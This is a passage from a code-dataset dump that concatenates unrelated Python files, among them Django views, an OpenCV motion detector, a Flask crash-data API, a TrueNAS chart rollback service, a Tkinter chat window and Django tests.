EquipmentConstructorForm\nfrom nop.models import Area\nfrom plan.forms import LoginForm, subdict\nfrom plan.models import InfoText\nfrom .models import StockStruct, Equipment, Scheme\n\n\n# главная страница конструкторского отдела\ndef index(request):\n c = {\n 'area_id': Area.objects.first().pk,\n 'login_form': LoginForm(),\n 'it': InfoText.objects.get(pageName=\"constructor_index\"),\n 'pageTitleHeader': 'Конструкторам',\n }\n return render(request, \"constructors/index.html\", c)\n\n\n# баланс на складе\ndef stockBalance(request, area_id):\n if request.method == \"POST\":\n # строим форму на основе запроса\n form = EquipmentListForm(request.POST, prefix='main_form')\n # если форма заполнена корректно\n if form.is_valid():\n # получаем объект площадки\n area = Area.objects.get(pk=area_id)\n # формируем список оборудования, у которого есть данные об этой площадке\n lst = []\n for e in form.cleaned_data['equipment']:\n try:\n eq = Equipment.objects.get(pk=e)\n flg = True\n for ss in eq.stockStruct.all():\n if ss.area == area:\n lst.append([eq, ss.cnt])\n flg = False\n if flg:\n messages.error(request, \"На этой площадке не найдено складской структуры \" + eq.name)\n except:\n messages.error(request, \"Оборудования с таким id не найдено\")\n # если списокнепустой\n if len(lst) > 0:\n # формируем страницу со списком\n c = {\n 'login_form': LoginForm(),\n 'lst': lst,\n 'area_id': int(area_id),\n 'pageTitleHeader': 'Конструкторам',\n }\n return render(request, \"constructors/stockList.html\", c)\n\n c = {\n 'area_id': int(area_id), # иначе не сравнить с id площадки при переборе\n 'areas': Area.objects.all().order_by('name'),\n 'curPageLink': \"/constructors/stock_balance/\",\n 'login_form': LoginForm(),\n 'chooseForm': EquipmentListWithoutSWForm(prefix=\"main_form\"),\n 'pageTitleHeader': 'Конструкторам',\n 'chooseHeader': 'Выберите оборудование, баланс которого на сладе надо отобразить',\n }\n return render(request, \"constructors/stockBalance.html\", c)\n\n\n# страница конструкторской работы\ndef tehnology(request):\n if request.method == \"POST\":\n # форма редактирования оборудования\n eq_form = EquipmentConstructorSingleForm(request.POST, prefix='eq_form')\n # если форма заполнена корректно\n if eq_form.is_valid():\n eq = Equipment.objects.get(pk=int(eq_form.cleaned_data['equipment']))\n return HttpResponseRedirect('/constructors/detail/' + str(eq.pk) + '/')\n c = {\n 'login_form': LoginForm(),\n 'chooseForm': EquipmentConstructorSingleForm(prefix=\"eq_form\"),\n 'creationForm': AddEquipmentForm(prefix=\"main_form\"),\n 'area_id': Area.objects.first().pk,\n 'pageTitleHeader': 'Конструкторам',\n 'chooseHeader': 'Выберите оборудование, которое Вы хотите поменять',\n 'creationUrl': '/constructors/addEquipment/'\n }\n return render(request, \"constructors/tehnology.html\", c)\n\n\n# добавление оборудования\ndef addEquipment(request):\n if request.method == \"POST\":\n # форма добавления оборужования\n form = AddEquipmentForm(request.POST, prefix='main_form')\n # если форма заполнена корректно\n if form.is_valid():\n d = {}\n d[\"name\"] = form.cleaned_data[\"name\"]\n d[\"equipmentType\"] = form.cleaned_data[\"tp\"]\n eq = Equipment.objects.create()\n\n if int(form.cleaned_data[\"tp\"]) == Equipment.TYPE_STANDART_WORK:\n d[\"dimension\"] = \"час\"\n d[\"duration\"] = 1\n else:\n d[\"dimension\"] = \"шт.\"\n\n for area in Area.objects.all():\n s = StockStruct.objects.create(area=area)\n eq.stockStruct.add(s)\n eq.save()\n Equipment.objects.filter(pk=eq.pk).update(**d)\n return HttpResponseRedirect('/constructors/detail/' + str(eq.pk) + '/')\n return HttpResponseRedirect('/constructors/work/')\n\n\n# детализация оборужования\ndef detailEquipment(request, eq_id):\n EquipmentFormset = formset_factory(EquipmentSingleWithCtnForm)\n\n eq = Equipment.objects.get(pk=eq_id)\n\n if request.method == 'POST':\n # строим форму на основе запроса\n form = EquipmentConstructorForm(request.POST, prefix='main_form')\n # если форма заполнена корректно\n if form.is_valid():\n d = subdict(form, (\"name\", \"needVIK\", \"equipmentType\"))\n Equipment.objects.filter(pk=eq_id).update(**d)\n eq = Equipment.objects.get(pk=eq_id)\n if eq.equipmentType == Equipment.TYPE_STANDART_WORK:\n try:\n eq.duration = form.cleaned_data[\"duration\"]\n except:\n messages.error(\"Не получилось задать длительность работы\")\n else:\n try:\n eq.code = form.cleaned_data[\"code\"]\n except:\n messages.error(\"Не получилось задать шифр изделия\")\n eq.scheme.clear()\n for e in form.cleaned_data[\"scheme\"]:\n eq.scheme.add(e)\n eq.save()\n equipment_formset = EquipmentFormset(request.POST, request.FILES, prefix='equipment')\n eq.addFromFormset(equipment_formset, True)\n gen_formset = EquipmentFormset(request.POST, request.FILES, prefix='gen')\n eq.addGenEquipmentFromFormset(gen_formset, True)\n\n ef = EquipmentConstructorForm(instance=Equipment.objects.get(pk=eq_id), initial={'scheme': eq.getSchemeChoices()},\n prefix=\"main_form\")\n ef.fields[\"equipmentType\"].initial = eq.equipmentType\n\n # print(eq.generateDataFromNeedStructs())\n # print( EquipmentFormset(initial=eq.generateDataFromNeedStructs(), prefix='equipment'))\n c = {'equipment_formset': EquipmentFormset(initial=eq.generateDataFromNeedStructs(), prefix='equipment'),\n 'gen_formset': EquipmentFormset(initial=eq.generateDataFromGenEquipment(), prefix='gen'),\n 'login_form': LoginForm(),\n 'one': '1',\n 'form': ef,\n 'eqType': eq.equipmentType,\n 'tsw': Equipment.TYPE_STANDART_WORK,\n 'eq_id': eq_id,\n 'area_id': Area.objects.first().pk,\n 'formsetNames': ['equipment', 'gen'],\n 'pageTitleHeader': 'Конструкторам',\n }\n return render(request, \"constructors/detail.html\", c)\n\n\n# удалить конструкторское оборудование\ndef deleteConstructorEquipment(request, eq_id):\n eq = Equipment.objects.get(pk=eq_id)\n eq.stockStruct.clear()\n eq.delete()\n return HttpResponseRedirect('/constructors/tehnology/')\n\n\n# список чертежей\ndef shemes(request):\n if request.method == 'POST':\n # строим форму на основе запроса\n form = SchemeSingleForm(request.POST, prefix=\"single-scheme\")\n # если форма заполнена корректно\n if form.is_valid():\n return HttpResponseRedirect('/constructors/sheme/detail/' + str(form.cleaned_data[\"scheme\"]) + '/')\n\n return render(request, \"constructors/shemesList.html\", {\n 'login_form': LoginForm(),\n 'schs': Scheme.objects.all(),\n 'one': '1',\n 'addForm': SchemeForm(prefix=\"add-scheme\"),\n 'chooseForm': SchemeSingleForm(prefix=\"single-scheme\"),\n 'area_id': Area.objects.first().pk,\n 'pageTitleHeader': 'Конструкторам',\n 'chooseHeader': 'Выберите чертёж, который Вы хотите редактировать',\n })\n\n\n# Добавить чертеж\ndef addScheme(request):\n if request.method == \"POST\":\n # форма добавления оборужования\n form = SchemeForm(request.POST, prefix='add-scheme')\n # если форма заполнена корректно\n if form.is_valid():\n code = form.cleaned_data[\"code\"]\n sch = Scheme.objects.create(link=form.cleaned_data[\"link\"], author=form.cleaned_data[\"author\"])\n sch.save()\n if (code is not None):\n sch.code = code\n sch.save()\n return HttpResponseRedirect('/constructors/sheme/detail/' + str(sch.pk) + '/')\n return HttpResponseRedirect('/constructors/work/')\n\n\n# Детализация чертежа\ndef shemeDetail(request, sh_id):\n if request.method == \"POST\":\n # форма добавления оборужования\n form = SchemeForm(request.POST)\n # если форма заполнена корректно\n if form.is_valid():\n sch = Scheme.objects.get(pk=sh_id)\n code = form.cleaned_data[\"code\"]\n sch.link = form.cleaned_data[\"link\"]\n sch.author = form.cleaned_data[\"author\"]\n if (code is not None):\n sch.code = code\n sch.save()\n\n return render(request, \"constructors/shemesDetail.html\", {\n 'login_form': LoginForm(),\n 'form': SchemeForm(instance=Scheme.objects.get(pk=sh_id)),\n 'area_id': Area.objects.first().pk,\n 'pageTitleHeader': 'Конструкторам',\n })\n","sub_path":"constructors/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"328870923","text":"import numpy as np\nimport cv2\nfrom time import sleep\nimport imutils\n\n# 0, -1 for single camera, 1 for secondary camera\ncam = cv2.VideoCapture(-1)\nprint('Camera: ', cam)\nprint('Is Camera opened: ', cam.isOpened())\n\n\nprint('Beginning to capture video...')\n\nfirstFrame = None\n\nwhile(True):\n\n text = \"Unoccupied\"\n\n # ret => return value(T/F) whether frame is captured or not\n\n ret, frame = cam.read()\n frame = imutils.resize(frame, width=500)\n\n # frame = cv2.flip(frame,-1)\n # 0 means flipping around the x-axis and positive value (like 1) means\n # flipping around y-axis. Negative value (like -1) means flipping around both axes\n\n # convert the image to grayscale and apply a blur\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n\n #gray = cv2.flip(gray,-1)\n\n if firstFrame is None:\n firstFrame = gray\n\n # take the difference b/w the current and the previous frame.\n frameDelta = cv2.absdiff(firstFrame, gray)\n\n # take a theshold to get a binary image.\n # dilate the obtained image to fill up the gaps\n thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n thresh = cv2.dilate(thresh, None, iterations=2)\n\n # find the blobs\n _, cnts, _ = cv2.findContours(thresh.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # if the blob is greater than some threshold then, we assume the room is occupied\n for c in cnts:\n if cv2.contourArea(c) < 900:\n continue\n (x, y, w, h) = cv2.boundingRect(c)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n text = \"Occupied\"\n\n # put the text on the image\n cv2.putText(frame, \"Room Status: {}\".format(text), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n\n # displays the frames in their respective window\n cv2.imshow('FRAME', frame)\n cv2.imshow(\"Thresh\", thresh)\n firstFrame = gray\n\n # waitkey waits for 1 millisec and listens to keybord\n # if 'q' is pressed exits from the loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\n# it is essential to release camera stream and destroys all the windows\ncam.release()\ncv2.destroyAllWindows()\n\n\n# NOTE:\n# the features implemented in cv2.videoCapture() need the V4L2(Video 4 Linux) drivers.\n# to activate v4l drivers: sudo modprobe bcm2835-v4l2\n# to set the capture format for video: (unless we set this, cv2.VdeoCapture doesnt work)\n# v4l2-ctl --set-fmt-video=width=1920,height=1088,pixelformat=4\n# not sure as of why still returning an warning/error message\n# when cv2.VideoCapture is called\n\n# few other commands of v4l lib are: (for more info on v4l visit: https://github.com/raspberrypi/linux/blob/rpi-3.10.y/Documentation/video4linux/bcm2835-v4l2.txt)\n# to list different formats available to record/capture: v4l2-ctl --list-formats\n\n# Some important commands:\n# img = cv2.imread('test.jpg', 0) --used to read image from a given file, 0 - converts to grayscale, 1 - to display as it is\n# cv2.namedWindow('image', cv2.WINDOW_NORMAL) --used to create a window\n# cv2.waitKey(0) --waits indefinitley for a user key-press\n","sub_path":"motion_detect.py","file_name":"motion_detect.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"537454253","text":"import sqlalchemy\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Float\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify, render_template\n\n################################\n#### Connection to Database ####\n################################\n\n# Create our session (link) from Python to the DB\nengine = create_engine(\"sqlite:///airplanestocks.sqlite\")\n\nsession = Session(engine)\n# reflect an existing database into a new model\nBase = declarative_base()\n\n#Declare the bases because automap doesn't work\nclass AmericanCrashes(Base):\n __tablename__ = \"american_crashes\"\n id = Column(Integer, primary_key = True)\n date = Column(String(10))\n manufacturer = Column(String(255))\n carrier = Column(String(255))\n fatalities = Column(Integer)\n location = Column(String(255))\n \nclass AllCrashes(Base):\n __tablename__ = \"all_crashes\"\n id = Column(Integer, primary_key = True)\n date = Column(String(10))\n manufacturer = Column(String(255))\n carrier = Column(String(255))\n fatalities = Column(Integer)\n location = Column(String(255)) \n\n####################################\n############# Flask ################\n####################################\napp = Flask(__name__)\n\n@app.route('/api')\ndef api():\n return render_template('api.html')\n\n@app.route('/api/american_carriers')\ndef american_crashes():\n engine = create_engine(\"sqlite:///airplanestocks.sqlite\")\n\n session = Session(engine)\n \n results = session.query(AmericanCrashes.date, AmericanCrashes.manufacturer, AmericanCrashes.carrier, AmericanCrashes.fatalities, AmericanCrashes.location).all()\n american_carriers = []\n for result in results:\n american_dict = {}\n american_dict['date'] = result.date\n american_dict['manufacturer'] = result.manufacturer\n american_dict['carrier'] = result.carrier\n american_dict['fatalities'] = result.fatalities\n american_dict['location'] = result.location\n american_carriers.append(american_dict)\n \n return jsonify(american_carriers)\n\n\n@app.route('/api/all_carriers')\ndef all_crashes():\n engine = create_engine(\"sqlite:///airplanestocks.sqlite\")\n\n session = Session(engine)\n \n results = session.query(AllCrashes.date, AllCrashes.manufacturer, AllCrashes.carrier, AllCrashes.fatalities, AllCrashes.location).all()\n \n airline_carriers = []\n for date, manufacturer, carrier, fatalities, location in results:\n airline_dict = {}\n airline_dict['date'] = date\n airline_dict['manufacturer'] = manufacturer\n airline_dict['carrier'] = carrier\n airline_dict['fatalities'] = fatalities\n airline_dict['location'] = location\n airline_carriers.append(airline_dict)\n \n return jsonify(airline_carriers) \n\n@app.route('/stock_impact')\ndef stock_impact():\n return render_template('stock_impact.html')\n\n@app.route('/crashdata')\ndef crash(): \n return render_template('crashdata.html')\n\n@app.route('/stock_comparison')\ndef datastock():\n return render_template('stock_comparison.html')\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n \nif __name__ == '__main__':\n app.run(debug=True, port = 5000) ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"166140021","text":"from datetime import datetime, timedelta\n\nfrom fuzzywuzzy import process\n\nimport InstagramScraper\nimport OCR\nimport database\n\nif __name__ == '__main__':\n # Define the Download Profile\n profile = {\n \"directory\": \"C:\\\\Users\\\\bett3\\\\Desktop\\\\Projects\\\\Hottest100\\\\InstagramData\\\\\"\n , \"hashtags\": ['hottest100', 'triplej']\n , \"start_datetime\": datetime.now() - timedelta(days=15)\n , \"end_datetime\": datetime.now()\n , \"get_videos\": False\n , \"get_videos_only\": False\n , \"get_post_json\": True\n , \"get_post_json_only\": False\n }\n\n # Execute the Downloader\n IL = InstagramScraper.Scraper(profile)\n IL.download()\n\n # Run the OCR\n cxn = database.connection()\n cxn.connect()\n processed_images = cxn.get_processed_votes()\n OCR.process_images(profile['directory'], processed_images)\n\n # Retrieve the results from OCR, match to valid songs\n song_list = cxn.get_song_list()\n votes = cxn.get_raw_votes()\n for vote in votes:\n Post_ID = vote[0]\n OCR_Artist_Track_Name = vote[1]\n Match = process.extractOne(OCR_Artist_Track_Name, song_list)\n Match_Artist_Track_Name = Match[0]\n Match_Likelihood = Match[1]\n cxn.insert_match_results(Post_ID, OCR_Artist_Track_Name, Match_Artist_Track_Name, Match_Likelihood)\n cxn.set_vote_processed()\n cxn.disconnect()\n print('Finished at ' + str(datetime.now()))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"169350624","text":"import errno\nimport os\nimport shutil\n\nfrom pkg_resources import parse_version\n\nfrom middlewared.schema import Bool, Dict, Str\nfrom middlewared.service import accepts, CallError, job, private, Service\n\nfrom .utils import get_namespace, run\n\n\nclass ChartReleaseService(Service):\n\n class Config:\n namespace = 'chart.release'\n\n @accepts(\n Str('release_name'),\n Dict(\n 'rollback_options',\n Bool('force', default=False),\n Bool('rollback_snapshot', default=True),\n Str('item_version', required=True),\n )\n )\n @job(lock=lambda args: f'chart_release_rollback_{args[0]}')\n async def rollback(self, job, release_name, options):\n \"\"\"\n Rollback a chart release to a previous chart version.\n\n `item_version` is version which we want to rollback a chart release to.\n\n `rollback_snapshot` is a boolean value which when set will rollback snapshots of ix_volumes.\n\n `force` is a boolean passed to helm for rollback of a chart release and also used for rolling back snapshots\n of ix_volumes.\n\n It should be noted that rollback is not possible if a chart release is using persistent volume claims\n as they are immutable.\n Rollback is only functional for the actual configuration of the release at the `item_version` specified and\n any associated `ix_volumes`.\n \"\"\"\n await self.middleware.call('kubernetes.validate_k8s_setup')\n release = await self.middleware.call(\n 'chart.release.query', [['id', '=', release_name]], {\n 'extra': {'history': True, 'retrieve_resources': True}, 'get': True,\n }\n )\n rollback_version = options['item_version']\n if rollback_version not in release['history']:\n raise CallError(\n f'Unable to find {rollback_version!r} item version in {release_name!r} history', errno=errno.ENOENT\n )\n\n chart_path = os.path.join(release['path'], 'charts', rollback_version)\n if not await self.middleware.run_in_thread(lambda: os.path.exists(chart_path)):\n raise CallError(f'Unable to locate {chart_path!r} path for rolling back', errno=errno.ENOENT)\n\n chart_details = await self.middleware.call('catalog.item_version_details', chart_path)\n await self.middleware.call('catalog.version_supported_error_check', chart_details)\n\n history_item = release['history'][rollback_version]\n history_ver = str(history_item['version'])\n\n ix_volumes_ds = os.path.join(release['dataset'], 'volumes/ix_volumes')\n snap_name = f'{ix_volumes_ds}@{history_ver}'\n if not await self.middleware.call('zfs.snapshot.query', [['id', '=', snap_name]]) and not options['force']:\n raise CallError(\n f'Unable to locate {snap_name!r} snapshot for {release_name!r} volumes', errno=errno.ENOENT\n )\n\n current_dataset_paths = {\n os.path.join('/mnt', d['id']) for d in await self.middleware.call(\n 'zfs.dataset.query', [['id', '^', f'{ix_volumes_ds}/']]\n )\n }\n history_datasets = {d['hostPath'] for d in history_item['config'].get('ixVolumes', [])}\n if history_datasets - current_dataset_paths:\n raise CallError(\n 'Please specify a rollback version where following iX Volumes are not being used as they don\\'t '\n f'exist anymore: {\", \".join(d.split(\"/\")[-1] for d in history_datasets - current_dataset_paths)}'\n )\n\n job.set_progress(25, 'Initial validation complete')\n\n # TODO: Upstream helm does not have ability to force stop a release, until we have that ability\n # let's just try to do a best effort to scale down scaleable workloads and then scale them back up\n scale_stats = await self.middleware.call('chart.release.scale', release_name, {'replica_count': 0})\n job.set_progress(45, 'Scaled down workloads')\n\n command = []\n if options['force']:\n command.append('--force')\n\n try:\n cp = await run(\n [\n 'helm', 'rollback', release_name, history_ver, '-n',\n get_namespace(release_name), '--recreate-pods'\n ] + command, check=False,\n )\n if cp.returncode:\n raise CallError(\n f'Failed to rollback {release_name!r} chart release to {rollback_version!r}: {cp.stderr.decode()}'\n )\n finally:\n await self.middleware.call('chart.release.sync_secrets_for_release', release_name)\n\n # We are going to remove old chart version copies\n await self.middleware.call(\n 'chart.release.remove_old_upgraded_chart_version_copies',\n os.path.join(release['path'], 'charts'), rollback_version,\n )\n\n if options['rollback_snapshot']:\n await self.middleware.call(\n 'zfs.snapshot.rollback', snap_name, {\n 'force': options['force'],\n 'recursive': True,\n 'recursive_clones': True,\n }\n )\n\n await self.middleware.call(\n 'chart.release.scale_release_internal', release['resources'], None, scale_stats['before_scale'], True,\n )\n\n job.set_progress(100, 'Rollback complete for chart release')\n\n await self.middleware.call('chart.release.chart_releases_update_checks_internal', [['id', '=', release_name]])\n\n return await self.middleware.call('chart.release.get_instance', release_name)\n\n @private\n def remove_old_upgraded_chart_version_copies(self, charts_path, current_version):\n c_v = parse_version(current_version)\n for v_path in filter(lambda p: p != current_version, os.listdir(charts_path)):\n if parse_version(v_path) > c_v:\n shutil.rmtree(path=os.path.join(charts_path, v_path), ignore_errors=True)\n","sub_path":"src/middlewared/middlewared/plugins/chart_releases_linux/rollback.py","file_name":"rollback.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"416683810","text":"from tkinter import Toplevel\r\nfrom tkinter.scrolledtext import ScrolledText\r\nfrom tkinter import Text\r\nfrom tkinter import Button\r\nfrom tkinter import END\r\nfrom tkinter import UNITS\r\nfrom time import localtime,strftime,time\r\n#We cannot use class WindowChat(TK), beacuse only one root window is allowed \r\n#but we can have multiple top level window\r\n\r\nclass WindowChat(Toplevel):\r\n def __init__(self):\r\n super(WindowChat,self).__init__()\r\n self.geometry('795x505')\r\n self.resizable(False,False)\r\n #add module\r\n self.add_widget()\r\n def add_widget(self):\r\n #add module\r\n #chat area\r\n #create a area that can scroll,where a main window contain many small window\r\n chat_text_area = ScrolledText(self)\r\n chat_text_area['width']=110\r\n chat_text_area['height']=30\r\n #window have two row(input area and button), \r\n #So the first row has to be aligned with the second row, columnspan=2\r\n \r\n chat_text_area.grid(row=0,column=0,columnspan=2)\r\n #'green' is a label, and sets its color to green. All text with this label is green\r\n\r\n chat_text_area.tag_config('green',foreground='green')\r\n chat_text_area.tag_config('system',foreground='red')\r\n #Then we should save this area in a dictionary like other area\r\n \r\n self.children['chat_text_area']=chat_text_area\r\n #input area\r\n chat_input_area=Text(self,name='chat_input_area')\r\n chat_input_area['width'] = 100\r\n chat_input_area['height'] = 7\r\n chat_input_area.grid(row=1,column=0,pady=10)\r\n #send area\r\n send_button=Button(self,name='send_button')\r\n send_button['text']='send'\r\n send_button['width']=5\r\n send_button['height']=2\r\n send_button.grid(row=1,column=1)\r\n def set_title(self,title):\r\n self.title(\"Welcome %s!\" %title)\r\n def on_send_button_click(self,command):\r\n #click send button and excute function commend\r\n\r\n self.children['send_button']['command']=command\r\n def get_inputs(self):\r\n #get message in input area and send it to chat room\r\n #we can delete value of chat_inout_area to get and delete\r\n #because area is text module\r\n\r\n return self.children['chat_input_area'].get(0.0,END)\r\n def clear_input(self):\r\n #clear the input box\r\n\r\n self.children['chat_input_area'].delete(0.0,END)\r\n def append_message(self,sender,message):\r\n #add a mesage to chat area\r\n #first show who send it and show the message he send\r\n\r\n send_time = strftime('%Y-%m-%d %H:%M:%S',localtime(time()))\r\n send_info='%s:%s\\n' % (sender,send_time)\r\n #position insert is end\r\n\r\n self.children['chat_text_area'].insert(END,send_info,'green')\r\n self.children['chat_text_area'].insert(END,' '+message+'\\n')\r\n\r\n #Automatically scroll down the screen\r\n self.children['chat_text_area'].yview_scroll(3,UNITS)\r\n def on_window_close(self,command):\r\n #close the window and release the resource\r\n\r\n self.protocol('WM_DELETE_WINDOW',command)\r\nif __name__ == '__main__':\r\n WindowChat().mainloop()","sub_path":"mini_chat/client/window_chat.py","file_name":"window_chat.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"313903017","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport cv2\n\nimport midi\nimport numpy as np\n\nclass Visualizer:\n def __init__(self):\n pass\n\n @staticmethod\n def visualize_samples(samples: np.array):\n print(samples.shape)\n vis_samples = np.concatenate(samples, axis=0)\n vis_samples = vis_samples.transpose([1, 0])\n print(vis_samples.shape)\n\n cv2.imshow(\"samples\", vis_samples*255)\n cv2.waitKey(0)\n\nif __name__ == '__main__':\n file = 'vgmusic/Nintendo 08 DS/DESTINY.mid'\n\n runner = midi.MidiRunner(file)\n samples = runner.midi_to_samples()\n\n vis = Visualizer()\n vis.visualize_samples(samples)","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"220454411","text":"#!/usr/bin/env python\nimport os\nimport sys\nsys.path.insert(1, os.path.abspath('..'))\n\n\n#---------------------------------------------------------------------------------------------------\n# VERIFICATION EXAMPLE: ZUNE BUG\n#---------------------------------------------------------------------------------------------------\n# This example presents the use of SMT solvers to verify correctness of the well known Zune bug.\n#\n#\n# NOTE: This example is currently work in progress and is not currently working.\n#---------------------------------------------------------------------------------------------------\n\nfrom pysv import smt_verifier\nfrom pysv import contract\n\n\"\"\"\nORIGINAL ZUNE BUG CODE:\nORIGINYEAR = 1980 (1980 was a leap year)\ninput: days (number of days since ORIGINYEAR)\n-----------------------------------\n\nyear = ORIGINYEAR;\nwhile (days > 365)\n{\n if (IsLeapYear(year))\n {\n if (days > 366)\n {\n days -= 366;\n year += 1;\n }\n # lack of else statement - not ending loop for 366'th day in a leap year\n }\n else\n {\n days -= 365;\n year += 1;\n }\n}\n\"\"\"\n\n# Only one leap\nzune_simplified = \"\"\"\n#year = 1980\n#if days > 365: # handled by precondition\ndays2 = days\nyear2 = year\nif year % 4 == 0:\n if days > 366:\n days2 = days - 366\n year2 = year + 1\n # lack of else statement\nelse:\n days2 = days - 365\n year2 = year + 1\n\"\"\"\ninput_vars = contract.ProgramVars({\"days\" : 'Int', \"year\" : 'Int'})\npre = \"days > 365 and year >= 1980\"\n# For this postcondition program doesn't meet the specification because the postcondition\n# is based on user intent and cod has a bug.\n# post = \"((not days == 366 or not year == 1980) or (year2 == 1980 and days2 == 0)) and \" +\\\n# \"((not days == 366 or not year == 1981) or (year2 == 1982 and days2 == 1))\"\n\n# For this postcondition program meets the specification because the postcondition\n# is based on the code.\n#post = \"((not days == 366 or not year == 1980) or (year2 == 1980 and days2 == 366)) and \" +\\\n# \"((not days == 366 or not year == 1981) or (year2 == 1982 and days2 == 1))\"\nt1 = ([\"days == 366\", \"year == 1980\"], [\"year2 == 1980\", \"days2 == 366\"])\nt2 = ([\"days == 366\", \"year == 1981\"], [\"year2 == 1982\", \"days2 == 1\"])\npost = contract.formula_test_cases_py([t1, t2])\n\n\ndays = 9\nyear = 1980\nif year % 4 == 0:\n if days > 366:\n days -= 366\n year += 1\n else:\n days -= 365\n year += 1\n","sub_path":"examples/ver_zune.py","file_name":"ver_zune.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"76462122","text":"from django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\nfrom django.utils.timezone import make_aware, localtime\nimport datetime\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Event, EventComment\n\n\ndef detail_url(event_id):\n \"\"\"Return detail event comment URL\"\"\"\n return reverse('event:eventComment', args=[event_id])\n\n\ndef delete_url(event_id, comment_id):\n \"\"\"Return delete event comment URL\"\"\"\n return reverse('event:deleteComment', args=[event_id, comment_id])\n\n\ndef sample_user(**params):\n \"\"\"Create and return a sample user\"\"\"\n return get_user_model().objects.create_user(**params)\n\n\ndef sample_event(user):\n \"\"\"Create and return a sample event\"\"\"\n default = {\n 'title': 'test title',\n 'description': 'test description',\n 'image': None,\n 'event_time': make_aware(datetime.datetime.now())\n .strftime('%Y-%m-%d %H:%M:%S'),\n 'address': 'test address',\n 'fee': 500,\n 'status': '1',\n }\n\n return Event.objects.create(organizer=user, **default)\n\n\ndef sample_event_comment(event, user, comment='test comment'):\n \"\"\"Create and return a sample event comment\"\"\"\n default = {'event': event, 'user': user, 'comment': comment}\n return EventComment.objects.create(**default)\n\n\ndef get_event_comment_by_json(**params):\n\n event_comment = EventComment.objects.get(id=params['id'])\n expected_json_dict = {\n 'id': event_comment.id,\n 'user': {\n 'first_name': event_comment.user.first_name,\n 'is_active': event_comment.user.is_active,\n 'icon': None\n },\n 'comment': event_comment.comment,\n 'brief_updated_at': localtime(event_comment.updated_at)\n .strftime('%Y-%m-%d %H:%M:%S')\n }\n return expected_json_dict\n\n\nclass PublicEventCommentApiTests(TestCase):\n \"\"\"Test that publcly available event comments API\"\"\"\n\n def setUp(self):\n self.user = sample_user(\n email='test@matsuda.com',\n password='testpass',\n first_name='test'\n )\n self.event = sample_event(self.user)\n self.event_comment = sample_event_comment(self.event, self.user)\n self.deleted_comment = sample_event_comment(self.event, self.user)\n self.deleted_comment.delete()\n self.deleted_comment.refresh_from_db()\n self.client = APIClient()\n\n def test_retrieve_event_comment_success(self):\n \"\"\"Test retrieving event comments\"\"\"\n url = detail_url(self.event.id)\n res = self.client.get(url, {'page': 1})\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n event_comments = EventComment.objects.filter(\n is_active=True).order_by('updated_at')\n expected_json_dict_list = []\n for event_comment in event_comments:\n expected_json_dict = {\n 'id': event_comment.id,\n 'event': event_comment.event.id,\n 'user': event_comment.user.id,\n 'first_name': event_comment.user.first_name,\n 'icon': event_comment.user.get_icon_url,\n 'comment': event_comment.comment,\n 'brief_updated_at': event_comment.get_brief_updated_at\n }\n expected_json_dict_list.append(expected_json_dict)\n\n expected_json = {\n \"count\": len(event_comments),\n \"next\": None,\n \"previous\": None,\n \"results\": expected_json_dict_list\n }\n self.assertJSONEqual(res.content, expected_json)\n\n def test_retrieve_event_comment_pagination_success(self):\n \"\"\"Test retrieving event comments with pagination\"\"\"\n count = 0\n while count < 15:\n sample_event_comment(self.event, self.user)\n count += 1\n\n url = detail_url(self.event.id)\n res = self.client.get(url, {'page': 1})\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data['results']), 15)\n\n res = self.client.get(url, {'page': 2})\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data['results']), 1)\n\n def test_retrieve_event_comment_pagination_false(self):\n \"\"\"Test retrieving event comments false with pagination\"\"\"\n url = detail_url(self.event.id)\n res = self.client.get(url, {'page': 0})\n self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)\n\n res = self.client.get(url, {'page': 2})\n self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_not_retrieve_deleted_comments(self):\n \"\"\"Test not retrieving deleted comments\"\"\"\n url = detail_url(self.event.id)\n res = self.client.get(url, {'page': 1})\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n expected_json_dict = {\n 'id': self.event_comment.id,\n 'event': self.event_comment.event.id,\n 'user': self.event_comment.user.id,\n 'first_name': self.event_comment.user.first_name,\n 'icon': 